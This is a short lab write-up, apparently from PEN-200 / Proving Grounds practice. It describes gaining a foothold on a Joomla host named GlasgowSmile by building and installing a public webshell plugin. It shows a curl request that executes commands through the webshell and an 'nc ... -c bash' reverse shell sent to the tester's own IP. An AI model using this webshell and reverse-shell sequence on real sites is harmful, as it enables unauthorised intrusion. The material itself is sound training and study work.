GlasgowSmile_Exploitation_2

Malicious Extension

---

A super user of the target Joomla instance has been compromised.

Joomla supports installation of custom extensions, which can be any form of PHP code, including a malicious webshell.

Exploit

---

A Joomla webshell plugin is available.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/glasgowsmile]
└─$ git clone https://github.com/p0dalirius/Joomla-webshell-plugin ; cd Joomla-webshell-plugin ; make 
Cloning into 'Joomla-webshell-plugin'...
remote: Enumerating objects: 33, done.
remote: Counting objects: 100% (33/33), done.
remote: Compressing objects: 100% (31/31), done.
remote: Total 33 (delta 4), reused 25 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (33/33), 3.21 MiB | 22.65 MiB/s, done.
Resolving deltas: 100% (4/4), done.
  adding: mod_webshell.xml (deflated 55%)
  adding: mod_webshell.php (deflated 63%)
  adding: tmpl/ (stored 0%)
  adding: tmpl/default.php (deflated 28%)
  adding: language/ (stored 0%)
  adding: language/en-GB/ (stored 0%)
  adding: language/en-GB/en-GB.mod_foo.ini (deflated 43%)
  adding: language/en-GB/en-GB.mod_foo.sys.ini (deflated 15%)
[+] Saved to ./dist/joomla-webshell-plugin-1.1.0.zip

Exploit downloaded & packaged for delivery.

Exploitation

---

Installation successful.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/glasgowsmile/Joomla-webshell-plugin]
└─$ curl -X POST http://$IP/joomla/modules/mod_webshell/mod_webshell.php --data "action=exec&cmd=id" 
{"stdout":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n","stderr":"","exec":"id"}

Code execution confirmed.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/glasgowsmile/Joomla-webshell-plugin]
└─$ curl -X POST http://$IP/joomla/modules/mod_webshell/mod_webshell.php --data "action=exec&cmd=nc 192.168.45.182 9999 -c bash"

Sending a reverse shell

Initial Foothold established to the glasgowsmile host as the www-data account via installing a malicious extension.